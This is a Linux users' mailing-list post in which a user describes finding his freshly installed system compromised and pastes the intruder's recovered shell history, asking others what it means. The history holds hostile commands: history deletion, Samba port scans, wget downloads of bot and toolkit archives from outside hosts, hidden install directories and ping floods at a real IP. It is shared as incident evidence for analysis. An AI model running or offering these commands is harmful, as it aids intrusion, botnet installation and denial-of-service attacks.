I think I have found the answer to my problems.  I got into a shell using
disc 1 of the installation cds.  I switched to super user mode and saw
various commands in the history that were not mine.  Someone got in earlier
this week and did some bad things to my system.  Below is the history if
anyone is interested in seeing what they were up to.  Any explanation of
what they did is welcome.  It was pretty much a fresh install, so I wiped
the disc and I am reinstalling.  I think I need to learn much more about
security.

TOm






history
rm -rf .bash_history
ls -al
w
cd /tmp/.cfg/
cd samba
./scan 217 139 97 1
./scan 62 139 217 98
./serv 67.160.4.66
./scan 67 139 160 4
./scan 217 139 0 1
ls -alF
cat /etc/issue
tar
cd /tmp
cd sh
ls -alF
tar -xzvf sh.tgz
exit
id
wget djcc.go.ro/bios.tgz
tar -xzvf bios.tgz
tar -xzvf bios.tgz
ls
rm -rf bios.tgz
ls
ps -aux
cat /proc/cpuinfo
exit
chmod 700 inst
chmod +x inst
exit
mkdir /dev/targa
cd /dev/targa
wget mihai-doini.org/bot.tgz
tar -xzvf bot.tgz
exit
ping -s -f 203.144.243.10 65500&
ping -f -s 203.144.243.10 65500&
ping -s -f 203.144.243.10 65500&
ls
cd /
ping -s -f 203.144.243.10 65500&
history | more
history | vim
history -w /tmp/hist.txt



_______________________________________________
TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
http://www.mn-linux.org tclug-list at mn-linux.org
https://mailman.real-time.com/mailman/listinfo/tclug-list